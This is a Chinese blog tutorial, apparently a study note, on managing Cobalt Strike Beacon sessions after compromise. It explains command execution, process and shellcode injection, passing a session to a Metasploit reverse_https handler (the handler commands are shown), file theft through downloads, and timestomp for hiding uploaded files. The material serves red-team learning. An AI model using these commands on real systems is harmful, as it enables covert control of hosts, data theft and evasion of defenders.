【CS学习笔记】10、如何管理Payload载荷

0x00 前言

到目前为止,已经学过了如何在有漏洞的目标上获取立足点的方法,接下来将继续学习后渗透相关的知识,这一节就来学习学习 beacon 的管理、会话传递等。

0x01 Beacon 的管理

Beacon 控制台

在一个 Beacon 会话上右击 interact(交互)即可打开 Beacon 控制台,如果想对多个会话进行控制,也只需选中多个会话,执行相关功能即可。

在 Beacon 的控制台中的输入与输出之间,是一个状态栏,状态栏上的信息分别是:目标 NetBIOS 名称、用户名、会话PID以及 Beacon 最近一次连接到 CS 团队服务器的时间。

Beacon 控制台是在使用 CS 的过程中,很经常用到的功能,向 Beacon 发出的每个命令,都可以在这里看到,如果队友发送了消息,在 Beacon 控制台同样能看到,消息前还会显示队友的名称。

Beacon 菜单

Access:包含了一些对凭据的操作及提权的选项

Explore:包含了信息探测与目标交互的选项

Pivoting:包含了一些设置代理隧道的选项

Session:包含了对当前 Beacon 会话管理的选项

Beacon 命令

help:查看 Beacon 命令的帮助信息。使用 help + 待查看帮助的命令可查看该命令的帮助信息。

clear:清除 Beacon 命令队列。Beacon 是一个异步的 Payload,输入的命令并不会立即执行,而是当 Beacon 连接到团队服务器时再一一执行命令,因此当需要清除队列命令时就可以使用 clear 命令。

sleep:改变 Beacon 的休眠时间。输入 sleep 30表示休眠30秒;输入sleep 60 50表示,随机睡眠 30秒至60秒,其中30秒 = 60 x 50%;如果输入 sleep 0则表示进入交互模式,任何输入的命令都会被立即执行,当输入一些命令,比如desktop时, Beacon 会自动进入交互模式。

shell:通过受害主机的 cmd.exe 执行命令。比如运行ipconfig,就需要输入shell ipconfig

run:不使用 cmd.exe 执行命令。该命令也是 run + 命令的形式运行,该命令会将执行结果回显。

execute:执行命令,但不回显结果。

cd:切换当前工作目录。

pwd:查看当前所在目录。

powershell:通过受害主机的 PowerShell 执行命令。比如想在 PowerShell 下运行 ipconfig,就需要输入powershell ipconfig

powerpick:不使用 powershell.exe 执行 powershell 命令。这个命令依赖于由 Lee Christensen 开发的非托管 PowerShell 技术。powershell 和 powerpick 命令会使用当前令牌( token )。

psinject:将非托管的 PowerShell 注入到一个特定的进程中并从此位置运行命令。

powershell-import:导入 PowerShell 脚本到 Beacon 中。直接运行 powershell-import + 脚本文件路径即可,但是这个脚本导入命令一次仅能保留一个 PowerShell 脚本,再导入一个新脚本的时候,上一个脚本就被覆盖了,因此可以通过导入一个空文件来清空 Beacon 中导入的脚本。

powershell get-help:获取 PowerShell 命令的相关帮助信息。比如想获取 PowerShell 下 get-process 命令的帮助,就需要输入powershell get-help get-process

execute-assembly:将一个本地的 .NET 可执行文件作为 Beacon 的后渗透任务来运行。

setenv:设置一个环境变量。

0x02 会话传递

会话传递相关命令

Beacon 被设计的最初目的就是向其他的 CS 监听器传递会话。

spawn:进行会话的传递,也可直接右击会话选择spawn命令进行会话的选择。默认情况下,spawn命令会在 rundll32.exe 中派生一个会话。为了更好的隐蔽性,可以找到更合适的程序(如 Internet Explorer) 并使用spawnto命令来说明在派生新会话时候会使用 Beacon 中的哪个程序。

spawnto:该命令会要求指明架构(x86 还是 x64)和用于派生会话的程序的完整路径。单独输入spawnto命令然后按 enter 会指示 Beacon 恢复至其默认行为。

inject:输入inject + 进程 id + 监听器名来把一个会话注入一个特定的进程中。使用 ps 命令来获取一个当前系统上的进程列表。使用inject [pid] x64来将一个64位 Beacon 注入到一个 64位进程中。

spawninject命令都将一个 payload stage 注入进内存中。如果 payload stage 是 HTTP、HTTPS 或 DNS Beacon 并且它无法连接到你,那么将看不到一个会话。如果 payload stage 是一个绑定的 TCP 或 SMB 的 Beacon,这些命令会自动地尝试连接到并控制这些 payload。

dllinjectdllinject + [pid]来将一个反射性 DLL 注入到一个进程中。

shinject:使用shinject [pid] [架构] [/路径/.../file.bin]命令来从一个本地文件中注入 shellcode 到一个目标上的进程中。

shspawn:使用shspawn [架构] [/路径/.../file.bin]命令会先派生一个新进程(这个新进程是 spawn to 命令指定的可执行文件),然后把指定的 shellcode 文件( file.bin )注入到这个进程中。

dllload:使用dllload [pid] [c:\路径\...\file.dll]来在另一个进程中加载磁盘上的 DLL文件。

会话传递使用场景

1、将当前会话传递至其他CS团队服务器中,直接右击spawn选择要传递的监听器即可。

2、将当前会话传递至MSF中,这里简单做一下演示。

首先,在MSF中,为攻击载荷新建一个payload

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 192.168.175.156
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > exploit -j

随后,在CS中新建一个外部Foreign监听器,这里设置的监听IP与端口和MSF中的一致即可,随后在CS中利用spawn选择刚新建的外部监听器,MSF中即可返回会话。

0x03 文件系统

浏览会话系统文件位置在右击会话处,选择 Explore --> File Browser即可打开。在这里可以对当前会话下的文件进行浏览、上传、下载、删除等操作。

在进行文件浏览时,如果 beacon 设置的 sleep 值较高,CS会因此而变得响应比较慢。

彩色文件夹表示该文件夹的内容位于此文件浏览器的缓存中;深灰色的文件夹表示该文件夹的内容不在此文件浏览器缓存中。

0x04 文件下载

download:下载请求的文件。Beacon 会下载它的任务要求获取的每一个文件的固定大小的块。这个块的大小取决于 Beacon 当前的数据通道。HTTP 和 HTTPS 通道会拉取 512kb 的数据块。

downloads:查看当前 Beacon 正在进行的文件下载列表。

cancel:该命令加上一个文件名来取消正在进行的一个下载任务。也可以在 cancel 命令中使用通配符来一次取消多个文件下载任务。

下载文件都将下载到CS团队服务器中,在View --> Download下可看到下载文件的记录,选中文件后使用Sync Files即可将文件下载到本地。

0x05 文件上传

upload:上传一个文件到目标主机上。

timestomp:将一个文件的修改属性访问属性和创建时间数据与另一个文件相匹配。当上传一个文件时,有时会想改变此文件的时间戳来使其混入同一文件夹下的其他文件中,使用timestomp 命令就可以完成此工作。

更多信息欢迎关注我的微信公众号:TeamsSix

原文链接:https://www.teamssix.com/year/200419-150531.html
参考链接:

https://www.bilibili.com/video/BV16b411i7n5

https://blog.ateam.qianxin.com/CobaltStrike4.0%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C_%E4%B8%AD%E6%96%87%E7%BF%BB%E8%AF%91.pdf

展开阅读全文
©️2020 CSDN 皮肤主题: 大白 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值